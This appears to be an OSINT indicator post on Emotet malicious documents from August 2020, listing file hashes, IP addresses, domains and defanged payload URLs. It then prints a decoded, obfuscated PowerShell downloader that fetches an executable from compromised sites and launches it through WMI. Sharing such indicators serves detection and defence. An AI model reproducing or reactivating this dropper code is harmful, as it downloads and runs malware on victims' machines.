Emotet_Doc_out_2020-08-12_13_30.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4.  
5. 44b8c2c694e595c5c101cd70e1c07cb585b19db23cfd60049e3fe445f6df525d
6. 6e9b1ad824b0bc35792a2ec92fabb0456af70c654e99e5f6d0067903f3c771ce
7. 52b725e19110d9c7b614784f84880a6f9e181c033ba521b012662ada81fc1cb7
8. 239b0c4f5e150bac96fff321ed672e0772718018ae715db9d4feb0b59879fbb7
9. bdc6eceba4b95bac120bfeb41f35e7df45c0f48d1188331f7085b65431d29398
10. b06fa4a03274712b0d1bea0d2a5d1afc2c71541acb80b1054d31b661b67514ea
11. 16e038d9e33c53b2a57906401ffe6a6980d0b45d153610dc7b2b7e4257a3c6e7
12. b16f77072d09279154089c427fc5151bc941751fde11d2e043d11f89f579d009
13. 96c9ac5b39fd07ad898f381241ff17d003a4a90f6f87ab45d8dd74634ca67b13
14. f72ce180f7fc38f18740d42dd0b6684e21e94348fe952221eb9a8f3c01400eb6
15. f4a1c1efb7093c25364d501dddf8dac96dccf05f85d85d2947f5a5d2a687280d
16. 120d8c2be86854307eaeb869f66dd85a90512e616a6390ebaf05c781ee48a6b3
17. 59ab542232a464397ef49e4cf9c531e4570fece1fd69a64bf56b7abc56e3d859
18. 8cc695377181d100d98ff6883804563f0a475e76454a98fe4c083005337e54ec
19. 38de02c634244bac2df0a0e467d1eaee89645b9f33c1927e04ccf08761264d47
20. 7f3f157b6efccbe88e544e49aa6b5571503e8f8e2d187cb88f30a38860b1537b
21.  
22.  
23. IPs:
24. 101.50.1.19
25. 104.238.124.62
26. 104.42.146.120
27. 132.148.143.123
28. 13.234.36.77
29. 192.34.63.244
30. 44.230.149.196
31. 47.241.2.252
32. 88.99.211.112
33. 99.198.101.186
34.  
35. Domains:
36.  
37. af.rologyx.com
38. beeptool.com
39. besanads.com
40. blog.newforceltd.com
41. c8xtt.com
42. dpsoma.com
43. samontime.com
44. scoopmagazines.com
45. sindobatam.com
46. techycivil.com
47.  
48.  
49. hxxps://samontime.com/wp-content/M7cidlobkp899135/
50. hxxp://techycivil.com/wp-content/wvr/
51. hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
52. hxxp://besanads.com/wp-admin/PbgJVpz/
53. hxxp://sindobatam.com/cgi-bin/5yq6g129/
54. hxxp://blog.newforceltd.com/wp-content/uploads/qf/
55. hxxps://c8xtt.com/wb/jDDwc504077/
56. hxxps://af.rologyx.com/sites/i4vBd0msh/
57. hxxps://beeptool.com/wp-admin/zyZ67961/
58. hxxps://dpsoma.com/crm/vUQz884/
59.  
60.  
61. Decoded Base64 Powershell:
62. $NMROOzgm='KLNDVdmf';
63. [Net.ServicePointManager]::"S`ec`URITYpr`OtOcoL" = 'tls12, tls11, tls';
64. $BVFWBptf = '413';
65. $EPVRZkhp='HPXXCocy';
66. $DUNQDywm=$env:userprofile+'\'+$BVFWBptf+'.exe';
67. $OGNJRema='XZBKWeta';
68. $CURKOwif=&('ne'+'w-obje'+'ct') NET.WebClIent;
69. $USUNLijk='hxxps://samontime.com/wp-content/M7cidlobkp899135/
70. hxxp://techycivil.com/wp-content/wvr/
71. hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
72. hxxp://besanads.com/wp-admin/PbgJVpz/
73. hxxp://sindobatam.com/cgi-bin/5yq6g129/'."sp`lIt"([char]42);
74. $RUSDGkte='NNLPTetq';
75. foreach($ERMRHnpl in $USUNLijk){try{$CURKOwif."doWnLoa`DfI`LE"($ERMRHnpl, $DUNQDywm);
76. $MUYRFyaj='KXTSEbek';
77. If ((&('Get-It'+'e'+'m') $DUNQDywm)."leng`Th" -ge 23021) {([wmiclass]'win32_Process')."cr`e`ATe"($DUNQDywm);
78. $LADQMaym='IGWRFahg';
79. break;
80. $APTDWujg='UJKLIasf'}}catch{}}$JELRGlcb='NGNRWvsk'$NCVHLgby='CATPTxiv';
81. [Net.ServicePointManager]::"s`EcUr`it`yPROto`cOl" = 'tls12, tls11, tls';
82. $UWFTVhcw = '119';
83. $SPMIUcfh='ASUNKxfy';
84. $NQEKRoch=$env:userprofile+'\'+$UWFTVhcw+'.exe';
85. $FFYJTczg='FDHKZevd';
86. $QALMYzjt=.('n'+'ew-obj'+'ect') neT.WeBClIEnt;
87. $DGBLBnzd='hxxp://blog.newforceltd.com/wp-content/uploads/qf/
88. hxxps://c8xtt.com/wb/jDDwc504077/
89. hxxps://af.rologyx.com/sites/i4vBd0msh/
90. hxxps://beeptool.com/wp-admin/zyZ67961/
91. hxxps://dpsoma.com/crm/vUQz884/'."SP`LIT"([char]42);
92. $BTBFFziy='INJRNzop';
93. foreach($TOCQGwsa in $DGBLBnzd){try{$QALMYzjt."d`owNloA`df`ilE"($TOCQGwsa, $NQEKRoch);
94. $IJWJIola='KPTQRhne';
95. If ((.('Get-'+'Item') $NQEKRoch)."LENg`Th" -ge 24008) {([wmiclass]'win32_Process')."CrE`A`TE"($NQEKRoch);
96. $AZZBUirs='NPIWJhnu';
97. break;
98. $RKNTFvxj='RVBDJuvp'}}catch{}}$JHBBRvdm='CTJIEman'
99.